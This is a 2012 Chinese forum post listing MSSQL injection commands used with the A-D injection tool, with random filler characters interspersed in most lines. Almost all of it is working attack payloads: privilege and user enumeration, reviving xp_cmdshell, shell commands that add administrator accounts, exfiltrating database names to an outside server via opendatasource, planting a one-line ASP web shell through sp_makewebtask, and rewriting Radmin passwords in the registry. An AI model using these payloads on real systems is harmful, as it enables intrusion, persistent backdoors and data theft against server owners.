找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1863|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令
4 Y5 p. q$ u& E/ j; s//看看是什么权限的
7 d5 v5 r/ D9 kand 1=(Select IS_MEMBER('db_owner'))
2 F  |* v' p/ Q' z4 |9 ~And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--8 X  U* L% W2 S; j1 h( j5 t$ _" z
# D3 `/ r1 {& \1 _/ V1 w* @& f- e) V
//检测是否有读取某数据库的权限& _% c  e/ u, b( N
and 1= (Select HAS_DBACCESS('master'))
$ ?) M( f/ a, QAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
0 D  ]$ i2 Y6 G( L7 |9 \& U
' X; ]8 T5 X7 I4 R
; p% U/ \' U/ V) ~, o5 w% @数字类型8 m% W% x; d" u" @
and char(124)%2Buser%2Bchar(124)=0
, S* d4 m2 Y9 |# h7 }" l$ h( H2 V4 B
字符类型5 H. o* b# x  R5 R! ]$ x% `
' and char(124)%2Buser%2Bchar(124)=0 and ''='
& F5 |5 B. S! [
- t0 G7 w3 w. B/ C搜索类型- @1 c+ z% z3 g' o
' and char(124)%2Buser%2Bchar(124)=0 and '%'='% R  ?' o5 y5 l

' t7 b/ G' y% M) f2 t3 x爆用户名8 n6 R) [+ L( w! W% G
and user>0+ m( P, j9 ]2 Y0 H
' and user>0 and ''='
! L; J) {) |6 a+ _6 Q# ~8 X. H
$ [9 ]' o& c- e( S  ]检测是否为SA权限, B5 n& s3 k' k( r8 C  M
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--' I1 R5 W2 z2 \
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --8 L1 }( Q* B' R+ R) i' j1 I
' M" c3 y0 ^/ g: a- R( I- e* B
检测是不是MSSQL数据库
( j$ j9 E" b7 gand exists (select * from sysobjects);-- ; q- }0 U/ y- |. m/ \* o
3 R4 v+ [; F8 a: V- G8 }$ {
检测是否支持多行- o. w- i7 a' j
;declare @d int;--
& v4 p& H" F) ^) j8 }6 x' C2 b* i8 d! r
恢复 xp_cmdshell: x1 o6 Y& H" x- {( Z( W2 o
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
4 G  H* n# z& V6 G6 B1 n: l# q5 a( M- h) O
% w! z7 f+ T* ?- J1 w" P
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
& p7 h- ?/ K" o* ?
& b3 \5 H: Z/ c//-----------------------% v8 \: {6 k* `* R/ ^" f. @
//      执行命令
' t0 I1 d3 a- W% @' p//-----------------------
$ X$ Y3 S. _. i1 W% o6 z9 j/ q/ h8 J首先开启沙盘模式:
8 B- G4 w. Y$ G, W( eexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
1 V; T7 W- s" j5 ^/ B) f: h  E  |7 Y0 W" @/ {9 \
然后利用jet.oledb执行系统命令
" i' K6 B- g+ Q& n* J: p) wselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
9 _/ U; }. r. u/ Y/ W. H: m
0 l8 n7 Q+ n6 g" a+ a执行命令+ \6 D4 n! J0 t9 p3 X
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--5 n# c, n$ ]) M  u. N! C( U

' U' P1 K9 e. L) }; ]: Z& ?EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'# }( X3 w& f0 z2 `7 w$ i) X$ b

5 p% s2 f# C3 O! I& C& X" M判断xp_cmdshell扩展存储过程是否存在:
0 F3 y4 s8 U+ S# E) H" dhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
7 {, z. n% |$ a" @
- ]+ N$ n+ g: s写注册表
+ f. ~3 `; Z7 {9 P6 Q" cexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1! F1 X! F& n* k* j% `0 q/ }. q

4 M8 t. H" @. W  S' r+ a- \( dREG_SZ
" p0 y3 a: H3 k0 o6 i0 x- Y" S- W2 R$ i# P
读注册表
- |* G, U8 z" W7 L& Y5 R# Y+ Bexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'- C2 z/ W$ w/ D7 B5 U: Y# D- u

0 ^: p# A& |' z  H读取目录内容
! }# A" c( E6 }+ k2 J! hexec master..xp_dirtree 'c:\winnt\system32\',1,1# F( `* X9 w0 ^! G' b& s0 B! M

! A+ U# v9 O. b, i& ]# o  h: s5 z0 T* w+ I
数据库备份
# Z7 r, I, ]! u) _: }' y0 \backup database pubs to disk = 'c:\123.bak'
* }  j5 w* G3 s) m) f
* W- \. X2 u9 f//爆出长度6 U% c- c. i- I% x0 E+ f% w- k
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
8 p  _3 N6 d- Q3 o7 C  O' D7 C
( ]. h7 `9 U, n" M1 {- ^0 {) Z# k: p3 f  I& \* z" B; Z& s; {
. s8 n4 X% r  y9 i
更改sa口令方法:用sql综合利用工具连接后,执行命令:& g+ m  W7 m- ~8 j% E& `
exec sp_password NULL,'新密码','sa') @# T: ]8 [6 Z) [. G
% z2 a' q/ n, r. {  K7 U
添加和删除一个SA权限的用户test:" {' f% a9 w0 f1 [2 R: i
exec master.dbo.sp_addlogin test,ptlove
8 W$ {' T' N1 a3 `2 A/ x) xexec master.dbo.sp_addsrvrolemember test,sysadmin2 x2 a# H( ^/ p, v; N, S" b( f8 t+ l

1 h3 {: _& J+ x/ G1 y1 G4 W删除扩展存储过过程xp_cmdshell的语句:
; X+ U+ o7 g! a. n, d- kexec sp_dropextendedproc 'xp_cmdshell'
* C; v- C1 K; i; R7 j% F  I, j5 I4 S5 K* I8 ^
添加扩展存储过过程' C. r7 ?4 P7 P! b" z" T
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'   W5 m, m1 U. p9 a
GRANT exec On xp_proxiedadata TO public
- b2 K' Q% K8 J1 [1 k, R
! f* W# c4 t2 p
1 [$ k% q) Q! \  T9 G& H- r停掉或激活某个服务。 2 \# G7 Z7 E4 _! n4 Z3 _- h
# U: \8 q& R0 {! U  r" i. V3 i
exec master..xp_servicecontrol 'stop','schedule'
$ B" c: {% v" w7 K5 \exec master..xp_servicecontrol 'start','schedule', \4 q6 p' J. m* ^

* K% l  a% [* T% v5 Z- a% {1 mdbo.xp_subdirs
$ _; O: o; b+ z: ~) U9 l6 {4 ~* {6 {3 |+ M
只列某个目录下的子目录。
0 h  I7 q! z1 ~' P7 Qxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'/ M- U& W* w  ?5 m  d& @
  z  _: ^$ H9 |' c
dbo.xp_makecab
! e& Y; D$ A4 i) A1 v
! e4 T: d6 y6 {9 E: _将目标多个档案压缩到某个目标档案之内。  B! G5 J/ k" f4 w7 d+ p
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。# C4 ?# b8 H3 ], c; T, \/ G, Z

1 U4 V. a7 M, n& ^; @3 ^dbo.xp_makecab
. U! A* [' [$ Q2 M'c:\test.cab','mszip',1,
5 [! I; Z& i2 Z7 j* {& x'C:\Inetpub\wwwroot\SQLInject\login.asp',
9 A3 B" v. t8 Q% {3 T6 F/ D8 I'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
+ }9 |, S7 b! ?$ p
, \. |* Q- o( u8 Gxp_terminate_process. {% h  E9 p8 X; y# P

1 S& l) d7 b$ ~3 m7 T! W( n4 O# M停掉某个执行中的程序,但赋予的参数是 Process ID。# n9 w) B5 m$ [
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID  R2 Y: g! x# V

; ]# P3 {+ ?7 d, }xp_terminate_process 2484
! \2 i2 e5 W5 H/ L" e2 q( S1 J6 F# Y
xp_unpackcab" G+ ~2 D3 R- K" ]0 b& M( h
1 ]) ]; g: u0 |4 d- \0 e( p3 }
解开压缩档。  o7 @& W8 e7 C- a1 s+ ?% [( _! k

' y+ `7 h6 |& i! p/ q. Axp_unpackcab 'c:\test.cab','c:\temp',1& `% d1 O* n& L# z. Q7 D; X1 d
9 G: e6 x6 E9 \% Q

& M" S% p; B, ]7 L5 T2 [8 n! m  r某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
4 H# I0 i( L  [) A" D" o5 L. b* [: r0 f7 n! v4 @: F
create database lcx;8 i0 W1 E( F  [5 L. g
Create TABLE ku(name nvarchar(256) null);
& D. X! N0 |3 L. C3 eCreate TABLE biao(id int NULL,name nvarchar(256) null);
) i/ S) \9 H7 ]0 }0 b
) F/ ?, Z0 s7 n$ N. ?, K//得到数据库名" X8 {0 O- [) j* C
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
! g5 b$ _5 C. t& y" g$ O& d5 s- Z) a2 S( E
: z% N! E7 L3 @" Z
//在Master中创建表,看看权限怎样
. Z2 n1 q6 w' @. b: `Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
4 d! Z' l7 b4 O, E' ^
' t- N/ m% V/ t; {6 W用 sp_makewebtask直接在web目录里写入一句话马:
: Z* K$ Z& Y9 l; V7 Whttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--! \- \" z3 O8 x2 Z* z1 j
1 U3 [- |) [: \6 p$ X
//更新表内容
3 z4 R! s4 z# ^6 ]6 _/ X0 _- RUpdate films SET kind = 'Dramatic' Where id = 123
/ {9 O- }3 T( v! E% K+ d. l. z8 `* \# W
//删除内容. \7 e1 g9 i4 T) o* s; }6 @  f
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表